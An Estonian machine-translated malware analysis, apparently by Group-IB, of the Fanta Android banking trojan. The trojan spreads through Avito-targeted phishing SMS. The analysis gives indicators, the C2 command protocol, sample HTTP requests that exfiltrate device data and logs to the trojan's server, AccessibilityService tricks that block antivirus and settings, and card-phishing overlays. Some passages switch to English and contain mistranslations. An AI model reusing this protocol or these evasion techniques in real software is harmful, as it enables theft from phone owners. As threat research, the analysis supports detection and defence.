Voolu, Fanta: vana Androidi trooja uus taktika

Voolu, Fanta: vana Androidi trooja uus taktika

Kord, kui soovite Avitos midagi mĂŒĂŒa ja postitate oma toote (nĂ€iteks mĂ€lu moodul) kohta pĂ”hjaliku kirjelduse, saate sellise sĂ”numi:

Voolu, Fanta: vana Androidi trooja uus taktikaLinki avades nĂ€ete esmapilgul ĂŒsna kahjutut lehekĂŒlge, mis teavitab teid, Ă”nnelikku ja edukat mĂŒĂŒjat, ostu sooritamisest:

Voolu, Fanta: vana Androidi trooja uus taktika
PĂ€rast nuppu „JĂ€tka“ vajutamist laaditakse teie Android-seadmest APK-fail, mille ikoon ja nimi tekitavad usaldusvÀÀrsuse. Olete paigaldanud rakenduse, mis mingil pĂ”hjusel kĂŒsib AccessibilityService Ă”igusi, siis ilmuvad ja kaovad kiiresti kaks akent ja
 KĂ”ik.

KĂŒlastate oma saldo kontrollimiseks, kuid teie pangarakendus kĂŒsib mingil pĂ”hjusel taas teie kaardandmeid. PĂ€rast andmete sisestamist juhtub kohutav asi: mingil teile veel arusaamatul pĂ”hjusel hakkavad raha teie kontolt kaduma. Proovite probleemi lahendada, kuid teie telefon vastandub: vajutab ise nuppe „Tagasi“ ja „Kodu“, ei keera vĂ€lja ja ei lase aktiveerida ĂŒhtegi kaitsemeetodit. LĂ”ppkokkuvĂ”ttes jÀÀte rahata, teie toodet ei osteta, olete segaduses ja kĂŒsitate endalt: mis juhtus?

Vastus on lihtne: olete saanud Androidi trooja, Fanta, Flexneti perest. Kuidas see juhtus? Selgitame kohe.

Autorid: Andrei Polovinkin, pahavara analĂŒĂŒsi noorem spetsialist, Ivan Pisarjev, pahavara analĂŒĂŒsi spetsialist.

Veidi statistikat

Esmakordselt sai Flexneti Androidi troojade perekonnast teada juba 2015. aastal. Pika aktiivsuse jooksul on see liikunud mitmete alamliikide, nagu Fanta, Limebot, Lipton jne, suunas. Trooja ja sellega seotud infrastruktuur ei seisa paigal: arendatakse vĂ€lja uusi tĂ”husaid levitusmeetodeid — meie puhul kvaliteetsed phishingi lehed, mis on suunatud konkreetsele mĂŒĂŒja kasutajale, ja trooja arendajad jĂ€rgivad viiruste kirjutamisel moetrende — lisavad uusi funktsioone, mis vĂ”imaldavad tĂ”husamalt raha varastada nakatunud seadmetelt ja kaitsemehhanisme ĂŒletada.

KÀesolevas artiklis kÀsitletud kampaania on suunatud Venemaa kasutajatele, vÀhehaaval on nakkusi registreeritud Ukrainas, veelgi vÀhem Kazahstanis ja Valgevenes.

Vaatamata sellele, et Flexnet on Androidi troojanide seas olnud juba rohkem kui 4 aastat ja paljude teadlaste poolt pĂ”hjalikult uuritud, on ta endiselt heas vormis. Alates 2019. aasta jaanuarist on potentsiaalne kahjusumma ĂŒletanud 35 miljonit rubla — ja see on ainult Venemaal toimunud kampaaniate pĂ”hjal. 2015. aastal mĂŒĂŒdi erinevaid selle Androidi troojani versioone underground-foorumites, kus leidus ka troojani lĂ€htekood koos detailselt kirja pandud kirjeldusega. See tĂ€hendab, et globaalne kahju on isegi muljetavaldavam. Pole paha nĂ€itaja sellise vanuri kohta, eks?

Voolu, Fanta: vana Androidi trooja uus taktika

MĂŒĂŒgist petmiseni

Nagu nĂ€ha eelnevalt esitatud Avito reklaamiteenuse kalastamislehe ekraanipildilt, valmistati see konkreetse ohvri jaoks. Tundub, et kurjategijad kasutavad ĂŒhte Avito parsi, mis toob vĂ€lja mĂŒĂŒja telefoninumbri ja nime ning toote kirjelduse. PĂ€rast lehe avamist ja APK-faili ettevalmistamist saadetakse ohvrile SMS koos tema nime ja lingiga kalastamislehele, mis sisaldab tema toote kirjeldust ning summat, mis saadi toote “mĂŒĂŒgis”. Nuppu vajutades saab kasutaja pahavara APK-faili — Fanta.

Domeeni shcet491[.]ru uurimine nÀitas, et see on delegeeritud Hostingeri ettevÔtte DNS-serveritele:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Domeeni tsoonifail sisaldab kirjeid, mis viitavad IP-aadressid 31.220.23[.]236, 31.220.23[.]243 ja 31.220.23[.]235. Kuid domeeni pÔhivara rekord (A-rekord) viitab serverile, mille IP-aadress on 178.132.1[.]240.

IP-aadress 178.132.1[.]240 asub Hollandis ja kuulub hostijale WorldStream. IP-aadressid 31.220.23[.]235, 31.220.23[.]236 ja 31.220.23[.]243 asuvad Suurbritannias ja kuuluvad HOSTINGERi virtuaalhostimise serverile. Registraatorina kasutatakse openprov-ru. IP-aadressil 178.132.1[.]240 olid samuti saadaval jÀrgmised domeenid:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Oluline on mÀrkida, et peaaegu kÔikidest domeenidest olid saadaval jÀrgmise formaadiga lingid:

http://(www.){0,1}/[0-9]{7}

Selle vormingu alla kuulub ka link SMS-sĂ”numis. Ajalooliste andmete pĂ”hjal on leitud, et ĂŒhele domeenile vastab mitu linki ĂŒlaltoodud malli jĂ€rgi, mis viitab samas domeenis trooja levitamisele mitmele ohvrile.

Vaatame natuke ette: juhtimiserverina kasutab SMS-i lingilt laaditud trooja aadressi onuseseddohap[.]club. See domeen registreeriti 2019-03-12 ning alates 2019-04-29 toimus APK-rakenduste suhtlemine selle domeeniga. Tugiades VirusTotal'ist saadud andmetele, oli kokku 109 rakendust, mis suhtlesid selle serveriga. Domeen resolviti IP-aadressile 217.23.14[.]27, mis asub Hollandis ja kuulub hostimise teenusele WorldStream. Registratorina kasutatakse namecheap. Sellele IP-aadressile olid samuti resolveeritud domeenid bad-racoon[.]club (alates 2018-09-25) ja bad-racoon[.]live (alates 2018-10-25). Domeeni korral bad-racoon[.]club on suhelnud enam kui 80 APK-failiga, bad-racoon[.]live — ĂŒle 100.

Üldiselt nĂ€eb rĂŒnnaku kĂ€ik jĂ€rgmine vĂ€lja:

Voolu, Fanta: vana Androidi trooja uus taktika

Mis on Fanta all katte all?

Nagu paljud teised Androidi troojalood, suudab Fanta lugeda ja saata SMS-sĂ”numeid, teha USSD-pĂ€ringuid ja kuvada oma aknaid rakenduste (sealhulgas pangarakenduste) kohal. Kuid selle pere funktsionaalsete vĂ”imaluste arsenali on lisandunud midagi uut: Fanta on hakanud kasutama AccessibilityService eri eesmĂ€rkidel: teiste rakenduste teatiste sisu lugemine, troojaloo tuvastamise ja peatamise takistamine nakatunud seadmes jne. Fanta töötab kĂ”ikidel Androidi versioonidel, mis ei ole vanemad kui 4.4. Selles artiklis vaatame lĂ€hemalt jĂ€rgmist Fanta-sĂŒlearvuti:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Otse pÀrast kÀivitamist

Otse pÀrast trooja kÀivitamist peidab see oma ikooni. Rakenduse töö on vÔimalik ainult siis, kui nakatunud seadme nimi ei ole loendis:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(razor)

See kontroll tehakse trooja peamise teenuse, MainService. Esimese kĂ€ivitamise ajal initsialiseeritakse rakenduse konfiguratsiooniparameetrid vaikimisi vÀÀrtustega (konfiguratsioonandmete salvestamise vormingi ja nende tĂ€henduse kohta rÀÀgitakse hiljem) ning registreeritakse uus nakatunud seade juhtserveris. Serverile saadetakse HTTP POST-pĂ€ring sĂ”numitĂŒĂŒbiga register_bot ja teabega nakatunud seadme kohta (Androidi versioon, IMEI, telefoninumber, operaatori nimi ja riigi kood, kus operaator on registreeritud). Juhtserverina toimib ala hXXp://onuseseddohap[.]club/controller.php. Server vastab sĂ”numiga, mis sisaldab jĂ€rgmisi vĂ€lju bot_id, bot_pwd, server — need vÀÀrtused salvestab rakendus CnC-serveri parameetritena. Parameeter server on valikuline, kui vĂ€li ei ole saadud: Fanta kasutab registreerimisadresse — hXXp://onuseseddohap[.]club/controller.php. CnC-aadressi muutmise funktsiooni abil saab lahendada kahte ĂŒlesannet: koormuse ĂŒhtlane jaotamine mitme serveri vahel (suure hulga nakatunud seadmete korral vĂ”ib koormus optimeerimata veebiserverile olla kĂ”rge) ja alternatiivse serveri kasutamine, kui ĂŒks CnC-serveritest peaks ebaĂ”nnestuma.

Kui pÀringu saatmise ajal ilmneb viga, kordab trooja registreerimisprotsessi 20 sekundi pÀrast.

PÀrast seadme Fanta eduka registreerimise korral kuvatakse kasutajale jÀrgmine teade:

Voolu, Fanta: vana Androidi trooja uus taktika
Oluline mĂ€rkusele: teenus nimega SĂŒsteemi turvalisus — trooja teenuse nimi, ja peale nupule vajutamist OK avaneb nakatunud seadme Accessibility seadeaken, kus kasutaja peab ise andma Accessibility Ă”igused kahjulikule teenusele:

Voolu, Fanta: vana Androidi trooja uus taktika
Kuna kasutaja lubab AccessibilityService, saab Fanta juurdepÀÀsu rakenduste akende sisule ja nende kaudu tehtavatele toimingutele:

Voolu, Fanta: vana Androidi trooja uus taktika
Vahetult pÀrast Accessibility Ôiguste saamist taotleb trooja administraatori Ôigusi ja teate lugemise Ôigusi:

Voolu, Fanta: vana Androidi trooja uus taktika
AccessibilityService'i abil simuleerib rakendus klahvivajutusi, andes endale kÔik vajalikud Ôigused.

Fanta loob mitmeid andmebaasi eksemplare (mille kohta rÀÀgitakse hiljem), mis on vajalikud konfiguratsioonide andmete ja nakatunud seadme kohta kogutud teabe salvestamiseks. Kogutud teabe edastamiseks loob trojan korduva ĂŒlesande, mis on mĂ”eldud andmevĂ€ljade laadimiseks andmebaasist ja kĂ€su saamiseks juhiserverilt. CnC pöördumiste vahemaa sĂ”ltub Androidi versioonist: versiooni 5.1 puhul on vahemik 10 sekundit, muul juhul 60 sekundit.

KĂ€su saamiseks teeb Fanta pĂ€ringu GetTask juhiserverile. Vastuseks vĂ”ib CnC saata ĂŒhe jĂ€rgmistest kĂ€skudest:

MeeskondKirjeldus
0Saada SMS-sÔnum
1Esitada telefonikÔne vÔi USSD-kÀsk
2Uuendab parameetrit interval
3Uuendab parameetrit intercept
6Uuendab parameetrit smsManager
9Alustada SMS-sÔnumite kogumist
11Teha telefon tehase seadetele tagasi
12KĂ€ivita/keela dialooge loomise logimine

Fanta kogub ka teateid 70 panganduse, kiirmaksete ja elektrooniliste rahakottide rakenduselt ning salvestab need andmebaasi.

Konfiguratsiooniparamentide salvestamine

Fanta salvestab konfiguratsiooniparameetrid standardse lĂ€henemisviisi abil Androidi platvormil — Preferences-failide. Seaded salvestatakse failisse nimega settings. Salvestatud parameetrite kirjeldus on tabelis allpool.

NimiVaikimisi vÀÀrtusVÔimalikud vÀÀrtusedKirjeldus
id0IntegerBoti identifikaator
serverhXXp://onuseseddohap[.]club/URLJuhtserveri aadress
pwd—StringServeri parool
interval20IntegerAjavahemik. NĂ€itab, kui palju aega tuleb jĂ€rgmiste ĂŒlesannete tĂ€itmise edasilĂŒkkamiseks:
  • Kui saadetakse pĂ€ring saadetud SMS-i oleku kohta
  • Uue kĂ€su saamine juhtserverilt

interceptallall/telNumberKui vĂ€li on stringiga all vĂ”i telNumber, siis saadetud SMS-i sĂ”numit rakendus pĂŒĂŒab kinni ja see ei kuvatud kasutajale
smsManager00/1Rakenduse lubamine/keelamine SMS-i vaikevastajana
readDialogfalseTrue/falseSĂŒndmuste logimise lubamine/keelamine AccessibilityEvent

Fanta kasutab ka faili smsManager:

NimiVaikimisi vÀÀrtusVÔimalikud vÀÀrtusedKirjeldus
pckg—StringKasutatava SMS-i halduri nimi

Koostöö andmebaasidega

Töötamise kÀigus kasutab troojalane kahte andmebaasi. Andmebaasi nimi on a kasutatakse erineva teabe hoidmiseks, mis on kogutud telefonist. Teise andmebaasi nimi on fanta.db ja seda kasutatakse seadistuste salvestamiseks, mis vastutavad kalastamise akende loomise eest, et koguda teavet pangakaartide kohta.

Trojan kasutab andmebaasi À kogutud teabe ja oma tegevuse logimise jaoks. Andmed salvestatakse tabelisse logs. Tabeli loomiseks kasutatakse jÀrgmist SQL-pÀringut:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Andmebaasis sisaldub jÀrgmine teave:

1. Nakkunud seadme sisselĂŒlitamise logimine sĂ”numiga Telefon on sisse lĂŒlitatud!

2. Rakendustelt saadud teated. SÔnum vormistatakse jÀrgmise ƥablooni jÀrgi:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Pangakaardid, mis saadakse Trojan'i loodud kalastusvormidest. Parameeter VIEW_NAME vĂ”ib olla ĂŒks jĂ€rgmistest:

  • AliExpress
  • Avito
  • Google Play
  • Erinevad <%App Name%>

SÔnum logitakse formaadis:

[]() Kaardi number:; KuupÀev:/; CVV:

4. Sissetulevad/vÀljuvad SMS-sÔnumid formaadis:

([{<%Time in format HH:mm:ss dd.MM.yyyy%>] TĂŒĂŒp: Sissetulev/VĂ€ljaminev) <%Mobile number%>:<%SMS-text%>

5. Teave paketi kohta, mis loob dialooge formaadis:

(<%Package name%>)<%Package information%>

NĂ€ide tabelist logs:

Voolu, Fanta: vana Androidi trooja uus taktika
Fanta ĂŒheks funktsiooniks on teabe kogumine pangakaartide kohta. Andmete kogumine toimub fisking-akenide loomise kaudu pankade rakenduste avamisel. Trojan loob fisking-akna ainult ĂŒks kord. Teave selle kohta, et aken on kasutajale nĂ€idatud, salvestatakse tabelisse settings andmebaasis fanta.db. Andmebaasi loomiseks kasutatakse jĂ€rgmist SQL-pĂ€ringut:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

KÔik tabeli vÀljad settings algseisuga initsialiseeritakse vÀÀrtusega 1 (loomine fisking-akna jaoks). PÀrast seda, kui kasutaja on andmed sisestanud, muudetakse vÀÀrtus 0-ks. Tabeli vÀljade nÀide settings:

  • can_login — vĂ€li, mis vastutab vormi kuvamise eest pangarakenduse avamisel
  • first_bank — ei kasutata
  • can_avito — vĂ€li, mis vastutab vormi kuvamise eest Avito rakenduse avamisel
  • can_ali — vĂ€li, mis vastutab vormi kuvamise eest Aliexpress rakenduse avamisel
  • can_another — see the form display when opening any application from the list: Yula, Pandao, Drom Auto, KoĆĄelek. Discount and bonus cards, Aviasales, Booking, Trivago
  • can_card — field responsible for showing the form when opened Google Play

Interaction with the managing server

Network interaction with the managing server occurs via the HTTP protocol. For network tasks, Fanta utilizes the popular Retrofit library. Requests are sent to the address hXXp://onuseseddohap[.]club/controller.php. The server address can change during registration on the server. The server may respond with cookies. Fanta performs the following requests to the server:

  • Bot registration on the managing server happens once at the initial launch. The following data about the compromised device is sent to the server:
    · Cookie — received cookies from the server (default value — empty string)
    · mode — string constant register_bot
    · prefix — integer constant 2
    · version_sdk — generated according to the following template: /(Avit)
    · imei — IMEI of the compromised device
    · country — country code, where the operator is registered, in ISO format
    · number — phone number
    · operator — operator name

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=&imei=&country=&number=&operator=
    

    Server peab vastama JSON-objektiga, mis sisaldab jÀrgmisi parameetreid:
    · bot_id — nakatunud seadme identifikaator. Kui bot_id on 0, kordab Fanta taotlust.
    · bot_pwd — serveri parool.
    · server — kontrollserveri aadress. Valikuline parameeter. Kui parameeter puudub, kasutatakse rakenduses salvestatud aadressi.

    JSON-objekti nÀide:

    {
        "response":[
       	 {
       		 "bot_id": ,
       		 "bot_pwd": ,
       		 "server": 
       	 }
        ],
        "status":"ok"
    }

  • Taotlus serverilt kĂ€su saamiseks. Serverile saadetakse jĂ€rgmised andmed:
    · Cookie — serverilt saadud kĂŒpsised
    · bid — nakatunud seadme id, mis saadi taotluse saatmisel register_bot
    · pwd — serveri parool
    · divice_admin — vĂ€li mÀÀrab, kas administreerimise Ă”igused on saadud. Kui Ă”igused on saadud, on vĂ€li 1, kui mitte, siis 0
    · Accessibility — Accessibility Service'i töö staatuse nĂ€itamine. Kui teenus on kĂ€ivitatud, on vÀÀrtus 1, kui mitte, siis 0
    · SMSManager — nĂ€itab, kas troojani rakendus on vaikimisi seadistatud SMSide vastuvĂ”tmiseks
    · ekraan — nĂ€itab ekraani seisundit. VÀÀrtus on seadistatud 1, kui ekraan on sisse lĂŒlitatud, vastasel juhul 0;

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=&pwd=&divice_admin=&Accessibility=&SMSManager=&screen=

    Server vÔib vastavalt kÀsule tagastada erinevate parameetritega JSON-objekti:

    · Meeskond Saada SMS-sĂ”num: Parameetrites on telefoninumber, SMS-sĂ”numi tekst ja saadetava sĂ”numi identifikaator. Identifikaatorit kasutatakse sĂ”numi saatmisel serverile tĂŒĂŒbiga setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": ,
       		 "sms_text": ,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Esitada telefonikÔne vÔi USSD-kÀsk: Telefoninumber vÔi kÀsk jÔuab vastuse kehas.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": 
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Muutke parameetrit interval.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": 
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Muutke parameetrit intercept.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Muuda SmsManageri vÀljund.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Koguda SMS-sÔnumeid nakatunud seadmest.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Teha telefon tehase seadetele tagasi:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Meeskond Muuda ReadDialog parameetrit.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • SĂ”numi saatmine tĂŒĂŒbi jĂ€rgi setSmsStatus. See pĂ€ring tehakse kĂ€su tĂ€itmise jĂ€rel Saada SMS-sĂ”num. PĂ€ring nĂ€eb vĂ€lja jĂ€rgmiselt:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=&status_sms=

  • Andmebaasi sisu saatmine. Ühe pĂ€ringu raames saadetakse ĂŒks rida. Serverile saadetakse jĂ€rgmised andmed:
    · Cookie — serverilt saadud kĂŒpsised
    · mode — string constant setSaveInboxSms
    · bid — nakatunud seadme id, mis saadi taotluse saatmisel register_bot
    · text — tekst praeguses andmebaasi kirjes (vĂ€lja d tabelist logs andmebaasis Ă€)
    · number — praeguse andmebaasi kirje nimetus (vĂ€lja p tabelist logs andmebaasis Ă€)
    · sms_mode — terviklik vÀÀrtus (vĂ€lja m tabelist logs andmebaasis Ă€)

    PÀring nÀeb vÀlja jÀrgmiselt:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Kui serverile on Ônnestunud saata, eemaldatakse rida tabelist. NÀide serveri tagastatud JSON-objektist:

    {
        "response":[],
        "status":"ok"
    }

Interaktsioon AccessibilityService'iga

AccessibilityService on loodud, et lihtsustada Android-seadmete kasutamist erivajadustega inimestele. Enamasti on rakendusega suhtlemiseks vajalik fĂŒĂŒsiline interaktsioon. AccessibilityService vĂ”imaldab seda teha programmiliselt. Fanta kasutab teenust valeakende loomiseks pangarakendustes ning takistab sĂŒsteemi seadete ja mĂ”nede rakenduste avamist.

Kasutades AccessibilityService'i funktsioonide kaudu, jĂ€lgib Trooja muudetud seadmes ekraanil olevate elementide muutusi. Nagu eelnevalt mainitud, sisaldab Fanta seadete all parameetrit, mis vastutab dialoogide tegevuste logimise eest — readDialog. Kui see parameeter on seadistatud, lisatakse andmebaasi teave paketi nime ja kirjelduse kohta, mis kĂ€ivitas sĂŒndmuse. Trooja tĂ€idab jĂ€rgmist tegevust sĂŒndmuste kĂ€ivitamisel:

  • Simuleerib tagasi ja koju nuppude vajutamist juhul:
    · kui kasutaja soovib oma seadet taaskÀivitada
    · kui kasutaja soovib eemaldada rakenduse “Avito” vĂ”i muuta juurdepÀÀsuĂ”igusi
    · kui lehe sisu sisaldab viidet rakendusele “Avito”
    · rakenduse “Google Play Protect” avamisel
    · SÀtteid AccessibiltyService avamisel
    · kui kuvatakse dialoog “SĂŒsteemi turvalisus”
    · avades lehe “Draw over other app” sĂ€tete jaoks
    · kui avatakse lehed “Rakendused”, “Taastamine ja lĂ€htestamine”, “Tehaseseaded”, “Seadete lĂ€htestamine”, “Arendaja valikud”, “Erilised vĂ”imalused”, “Spetsiifilised Ă”igused”
    · kui sĂŒndmus genereeriti teatud rakenduste poolt.

    Rakenduste nimekiri

    • android
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu rakenduse Ă”iguste haldamine
    • MIUI turvalisus
    • Clean Master — ViirusetĂ”rje & VahemĂ€lu ja rĂ€mpsfailide puhastamine
    • Vanemlik kontroll ja GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Veebiturbe beetaversioon
    • ViirusetĂ”rje, Antiviirus, Puhastaja (MAX Turvalisus)
    • Mobiilne Antiviirus Turvalisus PRO
    • Avast antiviirus & tasuta kaitse 2019
    • Mobiilitooted ĐœĐ”ĐłĐ°Đ€ĐŸĐœ
    • AVG Kaitse Xperia jaoks
    • Mobiilne Ohutus
    • Malwarebytes antiviirus & kaitse
    • Antiviirus Androidile 2019
    • Turvalisuse Meistrid — Antiviirus, VPN, Rakenduse Lukustus, Boost
    • AVG antiviirus Huawei tahvelarvuti System Manageri jaoks
    • Samsungi JuurdepÀÀsetavus
    • Samsung Smart Manager
    • Turvalisuse Meistrid
    • Kiirus Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobiilne Kontrollkeskus
    • Dr.Web Security Space Life
    • Dr.Web Mobiilne Kontrollkeskus
    • Antiviirus & Mobiilne Turvalisus
    • Kaspersky Interneti Turvalisus: Antiviirus ja Kaitse
    • Kaspersky Aku Elu: Energia sÀÀstja & Booster
    • Kaspersky Endpoint Security — kaitse ja haldamine
    • AVG Antiviirus tasuta 2019 – Kaitse Androidile
    • Antiviirus Androidile
    • Norton Mobiilne Turvalisus ja Antiviirus
    • Antiviirus, tulemĂŒĂŒr, VPN, mobiilne turvalisus
    • Mobiilne Turvalisus: antiviirus, VPN, varguse kaitse
    • Antiviirus Androidile

  • Kui lĂŒhinumbrile SMS-i saatmisel kĂŒsitakse luba, Fanta imiteerib checkboxi vajutamist MĂ€leta valikut ja nuppu saata.
  • Kui proovite troojalaselt administraatori Ă”igusi Ă€ra vĂ”tta, blokeerib see telefoni ekraani.
  • Takistab uute administraatorite lisamist.
  • Kui antiviirusrakendus dr.web leiab ohu, Fanta imiteerib nupu vajutamist ignoreerida.
  • Trojan imiteerib tagasi- ja kodu nuppude vajutamist, kui sĂŒndmus oli genereeritud rakenduse poolt Samsung Device Care.
  • Fanta loob petusaknaid, kus on vormid pangakaardi teabe sisestamiseks, kui rakendus kĂ€ivitatakse loendist, mis sisaldab umbes 30 erinevat veebiteenust. Nende seas: AliExpress, Booking, Avito, Google Play Market, Pandao, Drom Auto jne.

    Petusvormid

    Fanta analĂŒĂŒsib, milliseid rakendusi kĂ€ivitatakse nakatunud seadmes. Kui avatakse huvipakkuv rakendus, kuvab trojan petusakna kĂ”igi teiste peale, mis on vorm pangakaardi teabe sisestamiseks. Kasutajalt nĂ”utakse jĂ€rgmiste andmete sisestamist:

    • Kaardi number
    • Kaardi kehtivusaeg
    • CVV
    • Kaardi omaniku nimi (kĂ”igile pankadele mitte kohustuslik)

    SÔltuvalt avatud rakendusest kuvatakse erinevaid petusaknaid. Edasi on toodud nÀited mÔnest neist:

    Aliexpress:

    Voolu, Fanta: vana Androidi trooja uus taktika
    Avito:

    Voolu, Fanta: vana Androidi trooja uus taktika
    MÔnele teisele rakendusele, nÀiteks Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Voolu, Fanta: vana Androidi trooja uus taktika

    Kuidas asjad tegelikult olid

    Õnneks oli inimene, kes sai artikli alguses kirjeldatud SMS-sĂ”numi, kĂŒberjulgeoleku spetsialist. Seega erineb reaalsus, mitte reĆŸissööride versioon, varem jutustatavast: inimene sai huvitava SMS-i, mille ta edastas Group-IB Threat Hunting Intelligence meeskonnale. RĂŒnnaku tulemus — see artikkel. Õnnelik lĂ”pp, kas pole? Kuid kaugel sellest, et kĂ”ik lood lĂ”ppeksid nii hĂ€sti, ja et teie lugu ei sarnaneks reĆŸissööride versiooniga rahakaotusega, piisab enamikul juhtudel jĂ€rgida jĂ€rgmisi, vanu reegleid:

    • Ärge installige Androidi operatsioonisĂŒsteemiga mobiilirakendusi muudest allikatest peale Google Play.
    • Rakendust installides pöörake erilist tĂ€helepanu rakenduse nĂ”utavatele Ă”igustele.
    • Pöörake tĂ€helepanu allalaaditavate failide laiendustele.
    • Paigaldage regulaarselt Androidi operatsioonisĂŒsteemi vĂ€rskendused.
    • Ärge kĂŒlastage kahtlasi ressursse ega allalaadige sealt faile.
    • Ärge klikkige SMS-sĂ”numites saadud linkidel.

Allikas: habr.com

Osta usaldusvÀÀrne veebihosting DDoS kaitsega, VPS VDS serverid đŸ”„ Osta usaldusvÀÀrne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster